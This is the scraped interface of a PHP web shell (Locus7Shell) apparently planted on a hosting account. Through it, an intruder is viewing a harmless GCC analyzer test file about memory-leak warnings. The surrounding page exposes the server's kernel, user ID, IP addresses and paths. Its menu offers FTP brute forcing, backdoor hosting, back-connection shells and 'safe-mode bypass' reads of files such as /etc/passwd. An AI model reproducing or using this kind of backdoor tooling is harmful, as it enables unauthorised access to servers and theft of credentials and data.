Software: Apache. PHP/5.4.45 

uname -a: Linux webm056.cluster010.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue
Sep 17 08:14:20 UTC 2024 x86_64
 

uid=243112(mycochar) gid=100(users) groups=100(users)  

Safe-mode: OFF (not secure)

/home/mycochar/www/image/photo/gcc-12.3.0/gcc/testsuite/gcc.dg/analyzer/   drwxr-xr-x
Free 0 B of 0 B (0%)
Your ip: 216.73.216.77 - Server ip: 213.186.33.19
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    

[Enumerate]    [Encoder]    [Tools]    [Proc.]    [FTP Brute]    [Sec.]    [SQL]    [PHP-Code]    [Backdoor Host]    [Back-Connection]    [milw0rm it!]    [PHP-Proxy]    [Self remove]
    


Viewing file:     pr99774-2.c (2.46 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
#include <stdlib.h>

struct st
{
  void *m_f;
};

struct node
{
  struct node *m_next;
};

extern void unknown_fn (void *);
extern void const_unknown_fn (const void *);

void
test_1 (struct st *p, struct st *q)
{
  p->m_f = malloc (1024);
  q->m_f = NULL; /* { dg-bogus "leak" } */
  free (p->m_f);
}

void
test_2 (void)
{
  struct st s;
  s.m_f = malloc (1024);
  unknown_fn (&s);
  free (s.m_f);
}

void
test_3 (void)
{
  struct st s;
  s.m_f = malloc (1024);
  const_unknown_fn (&s);
  free (s.m_f);
}

void
test_4 (void)
{
  struct st s;
  s.m_f = malloc (1024);
  unknown_fn (&s);
} /* { dg-bogus "leak" } */

void
test_5 (void)
{
  struct st s;
  s.m_f = malloc (1024);
  /* s is const, but the pointer could still be freed; hence not a leak.  */
  const_unknown_fn (&s);
} /* { dg-bogus "leak" } */

void
test_6 (void)
{
  struct st s;
  s.m_f = malloc (1024);
} /* { dg-warning "leak" } */

struct st
test_7 (void)
{
  struct st s;
  s.m_f = malloc (1024);
  return s;
} /* { dg-bogus "leak" } */

struct node *
test_8 (void)
{
  struct node *n1 = malloc (sizeof (struct node));
  if (!n1)
    return NULL;
  n1->m_next = malloc (sizeof (struct node));
  return n1;
}

void
test_9 (void)
{
  struct node *n1 = malloc (sizeof (struct node));
  if (!n1)
    return;
  n1->m_next = malloc (sizeof (struct node));
  /* Could free n1 and n1->m_next.  */
  unknown_fn (n1);
}

void
test_10 (void)
{
  struct node *n1 = malloc (sizeof (struct node));
  if (!n1)
    return;
  n1->m_next = malloc (sizeof (struct node));
  /* Could free n1->m_next, but not n1.  */
  const_unknown_fn (n1); /* { dg-warning "leak of 'n1'" } */
}

void
test_11 (void)
{
  struct node *n1 = malloc (sizeof (struct node));
  if (!n1)
    return;
  n1->m_next = malloc (sizeof (struct node));
  /* Could free n1->m_next, but not n1.  */
  unknown_fn (n1->m_next); /* { dg-warning "leak of 'n1'" } */
}

void
test_12a (void)
{
  int *ip = malloc (sizeof (int));
  *ip = 42; /* { dg-warning "dereference of possibly-NULL 'ip'" } */
  free (ip);
}

void
test_12b (void)
{
  int *ip = malloc (sizeof (int));
  unknown_fn (ip);
  /* Might not be a null-deref, as unknown_fn could abort on NULL.  */
  *ip = 42;
  free (ip);
}

void
test_12c (void)
{
  int *ip = malloc (sizeof (int));
  /* Might not be a null-deref, as const_unknown_fn could abort on NULL.
     Right now we don't have a great way of handling this.  */
  const_unknown_fn (ip);
  *ip = 42; /* { dg-bogus "dereference of possibly-NULL 'ip'" "" { xfail *-*-* } } */
  free (ip);
}

Enter:
 
Select:
 

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

Search
  - regexp 

Upload
 
[ ok ]

Make Dir
 
[ ok ]
Make File
 
[ ok ]

Go Dir
 
Go File
 

--[ x2300 Locus7Shell v. 1.0a beta Modded by #!physx^ | www.LOCUS7S.com | Generation time: 0.006 ]--